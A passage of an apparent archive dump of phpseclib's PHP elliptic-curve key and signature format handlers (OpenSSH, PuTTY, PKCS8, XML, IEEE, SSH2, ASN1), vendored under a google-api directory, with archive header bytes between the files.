'ecdsa-sha2-nistp521', 'ssh-ed25519' ]; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $parsed = parent::load($key, $password); if (isset($parsed['paddedKey'])) { $paddedKey = $parsed['paddedKey']; list($type) = Strings::unpackSSH2('s', $paddedKey); if ($type != $parsed['type']) { throw new \RuntimeException("The public and private keys are not of the same type ($type vs $parsed[type])"); } if ($type == 'ssh-ed25519') { list(, $key, $comment) = Strings::unpackSSH2('sss', $paddedKey); $key = libsodium::load($key); $key['comment'] = $comment; return $key; } list($curveName, $publicKey, $privateKey, $comment) = Strings::unpackSSH2('ssis', $paddedKey); $curve = self::loadCurveByParam(['namedCurve' => $curveName]); $curve->rangeCheck($privateKey); return [ 'curve' => $curve, 'dA' => $privateKey, 'QA' => self::extractPoint("\0$publicKey", $curve), 'comment' => $comment ]; } if ($parsed['type'] == 'ssh-ed25519') { if (Strings::shift($parsed['publicKey'], 4) != "\0\0\0\x20") { throw new \RuntimeException('Length of ssh-ed25519 key should be 32'); } $curve = new Ed25519(); $qa = self::extractPoint($parsed['publicKey'], $curve); } else { list($curveName, $publicKey) = Strings::unpackSSH2('ss', $parsed['publicKey']); $curveName = '\phpseclib3\Crypt\EC\Curves\\' . $curveName; $curve = new $curveName(); $qa = self::extractPoint("\0" . $publicKey, $curve); } return [ 'curve' => $curve, 'QA' => $qa, 'comment' => $parsed['comment'] ]; } /** * Returns the alias that corresponds to a curve * * @return string */ private static function getAlias(BaseCurve $curve) { self::initialize_static_variables(); $reflect = new \ReflectionClass($curve); $name = $reflect->getShortName(); $oid = self::$curveOIDs[$name]; $aliases = array_filter(self::$curveOIDs, function ($v) use ($oid) { return $v == $oid; }); $aliases = array_keys($aliases); for ($i = 0; $i < count($aliases); $i++) { if (in_array('ecdsa-sha2-' . $aliases[$i], self::$types)) { $alias = $aliases[$i]; break; } } if (!isset($alias)) { throw new UnsupportedCurveException($name . ' is not a curve that the OpenSSH plugin supports'); } return $alias; } /** * Convert an EC public key to the appropriate format * * @param \phpseclib3\Crypt\EC\BaseCurves\Base $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param array $options optional * @return string */ public static function savePublicKey(BaseCurve $curve, array $publicKey, array $options = []) { $comment = isset($options['comment']) ? $options['comment'] : self::$comment; if ($curve instanceof Ed25519) { $key = Strings::packSSH2('ss', 'ssh-ed25519', $curve->encodePoint($publicKey)); if (isset($options['binary']) ? $options['binary'] : self::$binary) { return $key; } $key = 'ssh-ed25519 ' . base64_encode($key) . ' ' . $comment; return $key; } $alias = self::getAlias($curve); $points = "\4" . $publicKey[0]->toBytes() . $publicKey[1]->toBytes(); $key = Strings::packSSH2('sss', 'ecdsa-sha2-' . $alias, $alias, $points); if (isset($options['binary']) ? $options['binary'] : self::$binary) { return $key; } $key = 'ecdsa-sha2-' . $alias . ' ' . base64_encode($key) . ' ' . $comment; return $key; } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $privateKey * @param \phpseclib3\Crypt\EC\Curves\Ed25519 $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param string $secret optional * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(BigInteger $privateKey, BaseCurve $curve, array $publicKey, $secret = null, $password = '', array $options = []) { if ($curve instanceof Ed25519) { if (!isset($secret)) { throw new \RuntimeException('Private Key does not have a secret set'); } if (strlen($secret) != 32) { throw new \RuntimeException('Private Key secret is not of the correct length'); } $pubKey = $curve->encodePoint($publicKey); $publicKey = Strings::packSSH2('ss', 'ssh-ed25519', $pubKey); $privateKey = Strings::packSSH2('sss', 'ssh-ed25519', $pubKey, $secret . $pubKey); return self::wrapPrivateKey($publicKey, $privateKey, $password, $options); } $alias = self::getAlias($curve); $points = "\4" . $publicKey[0]->toBytes() . $publicKey[1]->toBytes(); $publicKey = self::savePublicKey($curve, $publicKey, ['binary' => true]); $privateKey = Strings::packSSH2('sssi', 'ecdsa-sha2-' . $alias, $alias, $points, $privateKey); return self::wrapPrivateKey($publicKey, $privateKey, $password, $options); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Keys/PuTTY.php000064400000010614147600400120023367 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\EC\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Common\Formats\Keys\PuTTY as Progenitor; use phpseclib3\Crypt\EC\BaseCurves\Base as BaseCurve; use phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards as TwistedEdwardsCurve; use phpseclib3\Math\BigInteger; /** * PuTTY Formatted EC Key Handler * * @author Jim Wigginton */ abstract class PuTTY extends Progenitor { use Common; /** * Public Handler * * @var string */ const PUBLIC_HANDLER = 'phpseclib3\Crypt\EC\Formats\Keys\OpenSSH'; /** * Supported Key Types * * @var array */ protected static $types = [ 'ecdsa-sha2-nistp256', 'ecdsa-sha2-nistp384', 'ecdsa-sha2-nistp521', 'ssh-ed25519' ]; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $components = parent::load($key, $password); if (!isset($components['private'])) { return $components; } $private = $components['private']; $temp = Strings::base64_encode(Strings::packSSH2('s', $components['type']) . $components['public']); $components = OpenSSH::load($components['type'] . ' ' . $temp . ' ' . $components['comment']); if ($components['curve'] instanceof TwistedEdwardsCurve) { if (Strings::shift($private, 4) != "\0\0\0\x20") { throw new \RuntimeException('Length of ssh-ed25519 key should be 32'); } $arr = $components['curve']->extractSecret($private); $components['dA'] = $arr['dA']; $components['secret'] = $arr['secret']; } else { list($components['dA']) = Strings::unpackSSH2('i', $private); $components['curve']->rangeCheck($components['dA']); } return $components; } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $privateKey * @param \phpseclib3\Crypt\EC\BaseCurves\Base $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param string $secret optional * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(BigInteger $privateKey, BaseCurve $curve, array $publicKey, $secret = null, $password = false, array $options = []) { self::initialize_static_variables(); $public = explode(' ', OpenSSH::savePublicKey($curve, $publicKey)); $name = $public[0]; $public = Strings::base64_decode($public[1]); list(, $length) = unpack('N', Strings::shift($public, 4)); Strings::shift($public, $length); // PuTTY pads private keys with a null byte per the following: // https://github.com/github/putty/blob/a3d14d77f566a41fc61dfdc5c2e0e384c9e6ae8b/sshecc.c#L1926 if (!$curve instanceof TwistedEdwardsCurve) { $private = $privateKey->toBytes(); if (!(strlen($privateKey->toBits()) & 7)) { $private = "\0$private"; } } $private = $curve instanceof TwistedEdwardsCurve ? Strings::packSSH2('s', $secret) : Strings::packSSH2('s', $private); return self::wrapPrivateKey($public, $private, $name, $password, $options); } /** * Convert an EC public key to the appropriate format * * @param \phpseclib3\Crypt\EC\BaseCurves\Base $curve * @param \phpseclib3\Math\Common\FiniteField[] $publicKey * @return string */ public static function savePublicKey(BaseCurve $curve, array $publicKey) { $public = explode(' ', OpenSSH::savePublicKey($curve, $publicKey)); $type = $public[0]; $public = Strings::base64_decode($public[1]); list(, $length) = unpack('N', Strings::shift($public, 4)); Strings::shift($public, $length); return self::wrapPublicKey($public, $type); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Keys/PKCS8.php000064400000017712147600400120023240 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\EC\Formats\Keys; use phpseclib3\Crypt\Common\Formats\Keys\PKCS8 as Progenitor; use phpseclib3\Crypt\EC\BaseCurves\Base as BaseCurve; use phpseclib3\Crypt\EC\BaseCurves\Montgomery as MontgomeryCurve; use phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards as TwistedEdwardsCurve; use phpseclib3\Crypt\EC\Curves\Ed25519; use phpseclib3\Crypt\EC\Curves\Ed448; use phpseclib3\Exception\UnsupportedCurveException; use phpseclib3\File\ASN1; use phpseclib3\File\ASN1\Maps; use phpseclib3\Math\BigInteger; /** * PKCS#8 Formatted EC Key Handler * * @author Jim Wigginton */ abstract class PKCS8 extends Progenitor { use Common; /** * OID Name * * @var array */ const OID_NAME = ['id-ecPublicKey', 'id-Ed25519', 'id-Ed448']; /** * OID Value * * @var string */ const OID_VALUE = ['1.2.840.10045.2.1', '', '']; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { // initialize_static_variables() is defined in both the trait and the parent class // when it's defined in two places it's the traits one that's called // the parent one is needed, as well, but the parent one is called by other methods // in the parent class as needed and in the context of the parent it's the parent // one that's called self::initialize_static_variables(); $key = parent::load($key, $password); $type = isset($key['privateKey']) ? 'privateKey' : 'publicKey'; switch ($key[$type . 'Algorithm']['algorithm']) { case 'id-Ed25519': case 'id-Ed448': return self::loadEdDSA($key); } $decoded = ASN1::decodeBER($key[$type . 'Algorithm']['parameters']->element); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } $params = ASN1::asn1map($decoded[0], Maps\ECParameters::MAP); if (!$params) { throw new \RuntimeException('Unable to decode the parameters using Maps\ECParameters'); } $components = []; $components['curve'] = self::loadCurveByParam($params); if ($type == 'publicKey') { $components['QA'] = self::extractPoint("\0" . $key['publicKey'], $components['curve']); return $components; } $decoded = ASN1::decodeBER($key['privateKey']); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } $key = ASN1::asn1map($decoded[0], Maps\ECPrivateKey::MAP); if (isset($key['parameters']) && $params != $key['parameters']) { throw new \RuntimeException('The PKCS8 parameter field does not match the private key parameter field'); } $components['dA'] = new BigInteger($key['privateKey'], 256); $components['curve']->rangeCheck($components['dA']); $components['QA'] = isset($key['publicKey']) ? self::extractPoint($key['publicKey'], $components['curve']) : $components['curve']->multiplyPoint($components['curve']->getBasePoint(), $components['dA']); return $components; } /** * Break a public or private EdDSA key down into its constituent components * * @return array */ private static function loadEdDSA(array $key) { $components = []; if (isset($key['privateKey'])) { $components['curve'] = $key['privateKeyAlgorithm']['algorithm'] == 'id-Ed25519' ? new Ed25519() : new Ed448(); // 0x04 == octet string // 0x20 == length (32 bytes) if (substr($key['privateKey'], 0, 2) != "\x04\x20") { throw new \RuntimeException('The first two bytes of the private key field should be 0x0420'); } $arr = $components['curve']->extractSecret(substr($key['privateKey'], 2)); $components['dA'] = $arr['dA']; $components['secret'] = $arr['secret']; } if (isset($key['publicKey'])) { if (!isset($components['curve'])) { $components['curve'] = $key['publicKeyAlgorithm']['algorithm'] == 'id-Ed25519' ? new Ed25519() : new Ed448(); } $components['QA'] = self::extractPoint($key['publicKey'], $components['curve']); } if (isset($key['privateKey']) && !isset($components['QA'])) { $components['QA'] = $components['curve']->multiplyPoint($components['curve']->getBasePoint(), $components['dA']); } return $components; } /** * Convert an EC public key to the appropriate format * * @param \phpseclib3\Crypt\EC\BaseCurves\Base $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param array $options optional * @return string */ public static function savePublicKey(BaseCurve $curve, array $publicKey, array $options = []) { self::initialize_static_variables(); if ($curve instanceof MontgomeryCurve) { throw new UnsupportedCurveException('Montgomery Curves are not supported'); } if ($curve instanceof TwistedEdwardsCurve) { return self::wrapPublicKey( $curve->encodePoint($publicKey), null, $curve instanceof Ed25519 ? 'id-Ed25519' : 'id-Ed448' ); } $params = new ASN1\Element(self::encodeParameters($curve, false, $options)); $key = "\4" . $publicKey[0]->toBytes() . $publicKey[1]->toBytes(); return self::wrapPublicKey($key, $params, 'id-ecPublicKey'); } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $privateKey * @param \phpseclib3\Crypt\EC\BaseCurves\Base $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param string $secret optional * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(BigInteger $privateKey, BaseCurve $curve, array $publicKey, $secret = null, $password = '', array $options = []) { self::initialize_static_variables(); if ($curve instanceof MontgomeryCurve) { throw new UnsupportedCurveException('Montgomery Curves are not supported'); } if ($curve instanceof TwistedEdwardsCurve) { return self::wrapPrivateKey( "\x04\x20" . $secret, [], null, $password, $curve instanceof Ed25519 ? 'id-Ed25519' : 'id-Ed448' ); } $publicKey = "\4" . $publicKey[0]->toBytes() . $publicKey[1]->toBytes(); $params = new ASN1\Element(self::encodeParameters($curve, false, $options)); $key = [ 'version' => 'ecPrivkeyVer1', 'privateKey' => $privateKey->toBytes(), //'parameters' => $params, 'publicKey' => "\0" . $publicKey ]; $key = ASN1::encodeDER($key, Maps\ECPrivateKey::MAP); return self::wrapPrivateKey($key, [], $params, $password, 'id-ecPublicKey', '', $options); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Keys/XML.php000064400000042737147600400120023055 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\EC\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\EC\BaseCurves\Base as BaseCurve; use phpseclib3\Crypt\EC\BaseCurves\Montgomery as MontgomeryCurve; use phpseclib3\Crypt\EC\BaseCurves\Prime as PrimeCurve; use phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards as TwistedEdwardsCurve; use phpseclib3\Exception\BadConfigurationException; use phpseclib3\Exception\UnsupportedCurveException; use phpseclib3\Math\BigInteger; /** * XML Formatted EC Key Handler * * @author Jim Wigginton */ abstract class XML { use Common; /** * Default namespace * * @var string */ private static $namespace; /** * Flag for using RFC4050 syntax * * @var bool */ private static $rfc4050 = false; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { self::initialize_static_variables(); if (!Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . gettype($key)); } if (!class_exists('DOMDocument')) { throw new BadConfigurationException('The dom extension is not setup correctly on this system'); } $use_errors = libxml_use_internal_errors(true); $temp = self::isolateNamespace($key, 'http://www.w3.org/2009/xmldsig11#'); if ($temp) { $key = $temp; } $temp = self::isolateNamespace($key, 'http://www.w3.org/2001/04/xmldsig-more#'); if ($temp) { $key = $temp; } $dom = new \DOMDocument(); if (substr($key, 0, 5) != '' . $key . ''; } if (!$dom->loadXML($key)) { libxml_use_internal_errors($use_errors); throw new \UnexpectedValueException('Key does not appear to contain XML'); } $xpath = new \DOMXPath($dom); libxml_use_internal_errors($use_errors); $curve = self::loadCurveByParam($xpath); $pubkey = self::query($xpath, 'publickey', 'Public Key is not present'); $QA = self::query($xpath, 'ecdsakeyvalue')->length ? self::extractPointRFC4050($xpath, $curve) : self::extractPoint("\0" . $pubkey, $curve); libxml_use_internal_errors($use_errors); return compact('curve', 'QA'); } /** * Case-insensitive xpath query * * @param \DOMXPath $xpath * @param string $name * @param string $error optional * @param bool $decode optional * @return \DOMNodeList */ private static function query(\DOMXPath $xpath, $name, $error = null, $decode = true) { $query = '/'; $names = explode('/', $name); foreach ($names as $name) { $query .= "/*[translate(local-name(), 'ABCDEFGHIJKLMNOPQRSTUVWXYZ','abcdefghijklmnopqrstuvwxyz')='$name']"; } $result = $xpath->query($query); if (!isset($error)) { return $result; } if (!$result->length) { throw new \RuntimeException($error); } return $decode ? self::decodeValue($result->item(0)->textContent) : $result->item(0)->textContent; } /** * Finds the first element in the relevant namespace, strips the namespacing and returns the XML for that element. * * @param string $xml * @param string $ns */ private static function isolateNamespace($xml, $ns) { $dom = new \DOMDocument(); if (!$dom->loadXML($xml)) { return false; } $xpath = new \DOMXPath($dom); $nodes = $xpath->query("//*[namespace::*[.='$ns'] and not(../namespace::*[.='$ns'])]"); if (!$nodes->length) { return false; } $node = $nodes->item(0); $ns_name = $node->lookupPrefix($ns); if ($ns_name) { $node->removeAttributeNS($ns, $ns_name); } return $dom->saveXML($node); } /** * Decodes the value * * @param string $value */ private static function decodeValue($value) { return Strings::base64_decode(str_replace(["\r", "\n", ' ', "\t"], '', $value)); } /** * Extract points from an XML document * * @param \DOMXPath $xpath * @param \phpseclib3\Crypt\EC\BaseCurves\Base $curve * @return object[] */ private static function extractPointRFC4050(\DOMXPath $xpath, BaseCurve $curve) { $x = self::query($xpath, 'publickey/x'); $y = self::query($xpath, 'publickey/y'); if (!$x->length || !$x->item(0)->hasAttribute('Value')) { throw new \RuntimeException('Public Key / X coordinate not found'); } if (!$y->length || !$y->item(0)->hasAttribute('Value')) { throw new \RuntimeException('Public Key / Y coordinate not found'); } $point = [ $curve->convertInteger(new BigInteger($x->item(0)->getAttribute('Value'))), $curve->convertInteger(new BigInteger($y->item(0)->getAttribute('Value'))) ]; if (!$curve->verifyPoint($point)) { throw new \RuntimeException('Unable to verify that point exists on curve'); } return $point; } /** * Returns an instance of \phpseclib3\Crypt\EC\BaseCurves\Base based * on the curve parameters * * @param \DomXPath $xpath * @return \phpseclib3\Crypt\EC\BaseCurves\Base|false */ private static function loadCurveByParam(\DOMXPath $xpath) { $namedCurve = self::query($xpath, 'namedcurve'); if ($namedCurve->length == 1) { $oid = $namedCurve->item(0)->getAttribute('URN'); $oid = preg_replace('#[^\d.]#', '', $oid); $name = array_search($oid, self::$curveOIDs); if ($name === false) { throw new UnsupportedCurveException('Curve with OID of ' . $oid . ' is not supported'); } $curve = '\phpseclib3\Crypt\EC\Curves\\' . $name; if (!class_exists($curve)) { throw new UnsupportedCurveException('Named Curve of ' . $name . ' is not supported'); } return new $curve(); } $params = self::query($xpath, 'explicitparams'); if ($params->length) { return self::loadCurveByParamRFC4050($xpath); } $params = self::query($xpath, 'ecparameters'); if (!$params->length) { throw new \RuntimeException('No parameters are present'); } $fieldTypes = [ 'prime-field' => ['fieldid/prime/p'], 'gnb' => ['fieldid/gnb/m'], 'tnb' => ['fieldid/tnb/k'], 'pnb' => ['fieldid/pnb/k1', 'fieldid/pnb/k2', 'fieldid/pnb/k3'], 'unknown' => [] ]; foreach ($fieldTypes as $type => $queries) { foreach ($queries as $query) { $result = self::query($xpath, $query); if (!$result->length) { continue 2; } $param = preg_replace('#.*/#', '', $query); $$param = self::decodeValue($result->item(0)->textContent); } break; } $a = self::query($xpath, 'curve/a', 'A coefficient is not present'); $b = self::query($xpath, 'curve/b', 'B coefficient is not present'); $base = self::query($xpath, 'base', 'Base point is not present'); $order = self::query($xpath, 'order', 'Order is not present'); switch ($type) { case 'prime-field': $curve = new PrimeCurve(); $curve->setModulo(new BigInteger($p, 256)); $curve->setCoefficients( new BigInteger($a, 256), new BigInteger($b, 256) ); $point = self::extractPoint("\0" . $base, $curve); $curve->setBasePoint(...$point); $curve->setOrder(new BigInteger($order, 256)); return $curve; case 'gnb': case 'tnb': case 'pnb': default: throw new UnsupportedCurveException('Field Type of ' . $type . ' is not supported'); } } /** * Returns an instance of \phpseclib3\Crypt\EC\BaseCurves\Base based * on the curve parameters * * @param \DomXPath $xpath * @return \phpseclib3\Crypt\EC\BaseCurves\Base|false */ private static function loadCurveByParamRFC4050(\DOMXPath $xpath) { $fieldTypes = [ 'prime-field' => ['primefieldparamstype/p'], 'unknown' => [] ]; foreach ($fieldTypes as $type => $queries) { foreach ($queries as $query) { $result = self::query($xpath, $query); if (!$result->length) { continue 2; } $param = preg_replace('#.*/#', '', $query); $$param = $result->item(0)->textContent; } break; } $a = self::query($xpath, 'curveparamstype/a', 'A coefficient is not present', false); $b = self::query($xpath, 'curveparamstype/b', 'B coefficient is not present', false); $x = self::query($xpath, 'basepointparams/basepoint/ecpointtype/x', 'Base Point X is not present', false); $y = self::query($xpath, 'basepointparams/basepoint/ecpointtype/y', 'Base Point Y is not present', false); $order = self::query($xpath, 'order', 'Order is not present', false); switch ($type) { case 'prime-field': $curve = new PrimeCurve(); $p = str_replace(["\r", "\n", ' ', "\t"], '', $p); $curve->setModulo(new BigInteger($p)); $a = str_replace(["\r", "\n", ' ', "\t"], '', $a); $b = str_replace(["\r", "\n", ' ', "\t"], '', $b); $curve->setCoefficients( new BigInteger($a), new BigInteger($b) ); $x = str_replace(["\r", "\n", ' ', "\t"], '', $x); $y = str_replace(["\r", "\n", ' ', "\t"], '', $y); $curve->setBasePoint( new BigInteger($x), new BigInteger($y) ); $order = str_replace(["\r", "\n", ' ', "\t"], '', $order); $curve->setOrder(new BigInteger($order)); return $curve; default: throw new UnsupportedCurveException('Field Type of ' . $type . ' is not supported'); } } /** * Sets the namespace. dsig11 is the most common one. * * Set to null to unset. Used only for creating public keys. * * @param string $namespace */ public static function setNamespace($namespace) { self::$namespace = $namespace; } /** * Uses the XML syntax specified in https://tools.ietf.org/html/rfc4050 */ public static function enableRFC4050Syntax() { self::$rfc4050 = true; } /** * Uses the XML syntax specified in https://www.w3.org/TR/xmldsig-core/#sec-ECParameters */ public static function disableRFC4050Syntax() { self::$rfc4050 = false; } /** * Convert a public key to the appropriate format * * @param \phpseclib3\Crypt\EC\BaseCurves\Base $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param array $options optional * @return string */ public static function savePublicKey(BaseCurve $curve, array $publicKey, array $options = []) { self::initialize_static_variables(); if ($curve instanceof TwistedEdwardsCurve || $curve instanceof MontgomeryCurve) { throw new UnsupportedCurveException('TwistedEdwards and Montgomery Curves are not supported'); } if (empty(static::$namespace)) { $pre = $post = ''; } else { $pre = static::$namespace . ':'; $post = ':' . static::$namespace; } if (self::$rfc4050) { return '<' . $pre . 'ECDSAKeyValue xmlns' . $post . '="http://www.w3.org/2001/04/xmldsig-more#">' . "\r\n" . self::encodeXMLParameters($curve, $pre, $options) . "\r\n" . '<' . $pre . 'PublicKey>' . "\r\n" . '<' . $pre . 'X Value="' . $publicKey[0] . '" />' . "\r\n" . '<' . $pre . 'Y Value="' . $publicKey[1] . '" />' . "\r\n" . '' . "\r\n" . ''; } $publicKey = "\4" . $publicKey[0]->toBytes() . $publicKey[1]->toBytes(); return '<' . $pre . 'ECDSAKeyValue xmlns' . $post . '="http://www.w3.org/2009/xmldsig11#">' . "\r\n" . self::encodeXMLParameters($curve, $pre, $options) . "\r\n" . '<' . $pre . 'PublicKey>' . Strings::base64_encode($publicKey) . '' . "\r\n" . ''; } /** * Encode Parameters * * @param \phpseclib3\Crypt\EC\BaseCurves\Base $curve * @param string $pre * @param array $options optional * @return string|false */ private static function encodeXMLParameters(BaseCurve $curve, $pre, array $options = []) { $result = self::encodeParameters($curve, true, $options); if (isset($result['namedCurve'])) { $namedCurve = '<' . $pre . 'NamedCurve URI="urn:oid:' . self::$curveOIDs[$result['namedCurve']] . '" />'; return self::$rfc4050 ? '' . str_replace('URI', 'URN', $namedCurve) . '' : $namedCurve; } if (self::$rfc4050) { $xml = '<' . $pre . 'ExplicitParams>' . "\r\n" . '<' . $pre . 'FieldParams>' . "\r\n"; $temp = $result['specifiedCurve']; switch ($temp['fieldID']['fieldType']) { case 'prime-field': $xml .= '<' . $pre . 'PrimeFieldParamsType>' . "\r\n" . '<' . $pre . 'P>' . $temp['fieldID']['parameters'] . '' . "\r\n" . '' . "\r\n"; $a = $curve->getA(); $b = $curve->getB(); list($x, $y) = $curve->getBasePoint(); break; default: throw new UnsupportedCurveException('Field Type of ' . $temp['fieldID']['fieldType'] . ' is not supported'); } $xml .= '' . "\r\n" . '<' . $pre . 'CurveParamsType>' . "\r\n" . '<' . $pre . 'A>' . $a . '' . "\r\n" . '<' . $pre . 'B>' . $b . '' . "\r\n" . '' . "\r\n" . '<' . $pre . 'BasePointParams>' . "\r\n" . '<' . $pre . 'BasePoint>' . "\r\n" . '<' . $pre . 'ECPointType>' . "\r\n" . '<' . $pre . 'X>' . $x . '' . "\r\n" . '<' . $pre . 'Y>' . $y . '' . "\r\n" . '' . "\r\n" . '' . "\r\n" . '<' . $pre . 'Order>' . $curve->getOrder() . '' . "\r\n" . '' . "\r\n" . '' . "\r\n"; return $xml; } if (isset($result['specifiedCurve'])) { $xml = '<' . $pre . 'ECParameters>' . "\r\n" . '<' . $pre . 'FieldID>' . "\r\n"; $temp = $result['specifiedCurve']; switch ($temp['fieldID']['fieldType']) { case 'prime-field': $xml .= '<' . $pre . 'Prime>' . "\r\n" . '<' . $pre . 'P>' . Strings::base64_encode($temp['fieldID']['parameters']->toBytes()) . '' . "\r\n" . '' . "\r\n" ; break; default: throw new UnsupportedCurveException('Field Type of ' . $temp['fieldID']['fieldType'] . ' is not supported'); } $xml .= '' . "\r\n" . '<' . $pre . 'Curve>' . "\r\n" . '<' . $pre . 'A>' . Strings::base64_encode($temp['curve']['a']) . '' . "\r\n" . '<' . $pre . 'B>' . Strings::base64_encode($temp['curve']['b']) . '' . "\r\n" . '' . "\r\n" . '<' . $pre . 'Base>' . Strings::base64_encode($temp['base']) . '' . "\r\n" . '<' . $pre . 'Order>' . Strings::base64_encode($temp['order']) . '' . "\r\n" . ''; return $xml; } } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Signature/IEEE.php000064400000003035147600400120024136 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\EC\Formats\Signature; use phpseclib3\Math\BigInteger; /** * ASN1 Signature Handler * * @author Jim Wigginton */ abstract class IEEE { /** * Loads a signature * * @param string $sig * @return array */ public static function load($sig) { if (!is_string($sig)) { return false; } $len = strlen($sig); if ($len & 1) { return false; } $r = new BigInteger(substr($sig, 0, $len >> 1), 256); $s = new BigInteger(substr($sig, $len >> 1), 256); return compact('r', 's'); } /** * Returns a signature in the appropriate format * * @param \phpseclib3\Math\BigInteger $r * @param \phpseclib3\Math\BigInteger $s * @return string */ public static function save(BigInteger $r, BigInteger $s) { $r = $r->toBytes(); $s = $s->toBytes(); $len = max(strlen($r), strlen($s)); return str_pad($r, $len, "\0", STR_PAD_LEFT) . str_pad($s, $len, "\0", STR_PAD_LEFT); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Signature/SSH2.php000064400000004251147600400120024147 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\EC\Formats\Signature; use phpseclib3\Common\Functions\Strings; use phpseclib3\Math\BigInteger; /** * SSH2 Signature Handler * * @author Jim Wigginton */ abstract class SSH2 { /** * Loads a signature * * @param string $sig * @return mixed */ public static function load($sig) { if (!is_string($sig)) { return false; } $result = Strings::unpackSSH2('ss', $sig); if ($result === false) { return false; } list($type, $blob) = $result; switch ($type) { // see https://tools.ietf.org/html/rfc5656#section-3.1.2 case 'ecdsa-sha2-nistp256': case 'ecdsa-sha2-nistp384': case 'ecdsa-sha2-nistp521': break; default: return false; } $result = Strings::unpackSSH2('ii', $blob); if ($result === false) { return false; } return [ 'r' => $result[0], 's' => $result[1] ]; } /** * Returns a signature in the appropriate format * * @param \phpseclib3\Math\BigInteger $r * @param \phpseclib3\Math\BigInteger $s * @param string $curve * @return string */ public static function save(BigInteger $r, BigInteger $s, $curve) { switch ($curve) { case 'secp256r1': $curve = 'nistp256'; break; case 'secp384r1': $curve = 'nistp384'; break; case 'secp521r1': $curve = 'nistp521'; break; default: return false; } $blob = Strings::packSSH2('ii', $r, $s); return Strings::packSSH2('ss', 'ecdsa-sha2-' . $curve, $blob); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Signature/Raw.php000064400000001010147600400120024147 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\EC\Formats\Signature; use phpseclib3\Crypt\Common\Formats\Signature\Raw as Progenitor; /** * Raw DSA Signature Handler * * @author Jim Wigginton */ abstract class Raw extends Progenitor { } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Signature/ASN1.php000064400000002610147600400120024127 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\EC\Formats\Signature; use phpseclib3\File\ASN1 as Encoder; use phpseclib3\File\ASN1\Maps\EcdsaSigValue; use phpseclib3\Math\BigInteger; /** * ASN1 Signature Handler * * @author Jim Wigginton */ abstract class ASN1 { /** * Loads a signature * * @param string $sig * @return array */ public static function load($sig) { if (!is_string($sig)) { return false; } $decoded = Encoder::decodeBER($sig); if (empty($decoded)) { return false; } $components = Encoder::asn1map($decoded[0], EcdsaSigValue::MAP); return $components; } /** * Returns a signature in the appropriate format * * @param \phpseclib3\Math\BigInteger $r * @param \phpseclib3\Math\BigInteger $s * @return string */ public static function save(BigInteger $r, BigInteger $s) { return Encoder::encodeDER(compact('r', 's'), EcdsaSigValue::MAP); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/PrivateKey.php000064400000022347147600400120022145 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\EC; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Common; use phpseclib3\Crypt\EC; use phpseclib3\Crypt\EC\BaseCurves\Montgomery as MontgomeryCurve; use phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards as TwistedEdwardsCurve; use phpseclib3\Crypt\EC\Curves\Curve25519; use phpseclib3\Crypt\EC\Curves\Ed25519; use phpseclib3\Crypt\EC\Formats\Keys\PKCS1; use 